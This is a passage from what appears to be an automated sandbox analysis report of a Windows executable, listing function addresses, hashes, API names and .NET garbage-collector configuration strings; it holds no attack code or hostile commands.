                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 803ee097a5861c941b8cfd7976f9223188b032406d6128dfb8400f5b6217b5c5
                                                                                                                                                                                                                                                                                  • Instruction ID: 6479a6038acff969cd0a2c6aad9b785c947e7a6327413cfad8dd6ce0baf3b69d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 803ee097a5861c941b8cfd7976f9223188b032406d6128dfb8400f5b6217b5c5
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0721B322F092C254F720FA639C516FE96A9FF54748FB44035EE4E46687DE2CE4428B20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B74AB Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
                                                                                                                                                                                                                                                                                  • Instruction ID: 6e98e61b0f85397794b6dcdaeb33280682e90393047d9fa51bb79dd5d036dc52
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C611A563F18B8542E6509B22EC016E59394EB997B0F985331EE6D537CAEF2CD4428B50
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A4930 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2131581837-0
                                                                                                                                                                                                                                                                                  • Opcode ID: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
                                                                                                                                                                                                                                                                                  • Instruction ID: d915f072a834cdfcf693832b8a62dd7bafe56e95ebba60fd81c341838141e850
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B111F7260978242D614AF26B8051EAB361F7457B0F548339E6BD077D6DF39D0568B10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A56A0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Event
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 4201588131-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
                                                                                                                                                                                                                                                                                  • Instruction ID: 778b8afa83d5ba02d1a1da1b479cbec84b49316c1fd678eb63d525a27c2556ef
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDF08215F286C242E6007B22BD826FE9356EF897E0F945130E95D07797CE3CD4918F50
                                                                                                                                                                                                                                                                                  Function 00007FF72F624160 Relevance: 1.5, APIs: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b2df50b22f88e90d383fbc999c0b4c68a7662b2a9291df2bb10142457fbc865c
                                                                                                                                                                                                                                                                                  • Instruction ID: 5cd62c0b599c2009f9497cdccc4662bf34227656843548da76648e80872ad7e6
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2df50b22f88e90d383fbc999c0b4c68a7662b2a9291df2bb10142457fbc865c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D61DF21F092828AFB14FB66AC412F9A36AFF54784F944035DE0D5BB96DE3CE5528B10
                                                                                                                                                                                                                                                                                  Function 00007FF72F60B610 Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF72F60AC51,?,?,?,?,00007FF72F5AFCD1,?,?,?,00007FF72F5B0254,00000000,00000020,?), ref: 00007FF72F60B62A
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                  • Opcode ID: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
                                                                                                                                                                                                                                                                                  • Instruction ID: 0b7ec15fbcb5621f8076487a0d0e78183bed82fee291fffa99b9142b0e3970b7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72E0EC00F2918701F95932A15C661F4814AFF55770EBC9B38E97E853C3FD1CA8565D30
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B1770 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                  • Opcode ID: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
                                                                                                                                                                                                                                                                                  • Instruction ID: af164b4601adce9cef70bccbc1d092fafd66a7aac49e1022e494f086de350c2b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DB01200F16481C2E3043723BC82308011ABB06B02FC04024DA08F1250CD1D81A50F10

                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                  Function 00007FF72F5B1A00 Relevance: 118.0, Strings: 94, Instructions: 546COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                                                                                                                                                                                                                                                                                  • API String ID: 0-799405152
                                                                                                                                                                                                                                                                                  • Opcode ID: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
                                                                                                                                                                                                                                                                                  • Instruction ID: 1741177ce2a31e2ac9b9003e38ce340ac3dde06d6df772ccec2b45d3ddf195df
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7423B69B08AD642FB20AB55FC50AE9A3A5FF59BC8FC15136D98C07B24DF7CD2018B14
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B2750 Relevance: 109.2, Strings: 87, Instructions: 472COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: strcmp
                                                                                                                                                                                                                                                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                                                                                                                                                                                                                                                  • API String ID: 1004003707-1294421646
                                                                                                                                                                                                                                                                                  • Opcode ID: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
                                                                                                                                                                                                                                                                                  • Instruction ID: 80364c77dd8d10372030d73ba076a7384cc2aedd758f56887be783c19c0a6dc9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6862BE28F0AAC796FB01FB96AC448E1A7A1FF5D384BC4413BD44C47362DE7DA1598B60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5E1200 Relevance: 21.8, APIs: 14, Instructions: 792COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
                                                                                                                                                                                                                                                                                  • Instruction ID: 2042e7818eb440be6cb7f0eb299b53ad5b2f1241de497be50c9e55e560b84a8c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8729D22B096C282FA68AB1699403F9E7A0FF49B94F985135CE5D07BD5DF3CE450CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B1830 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
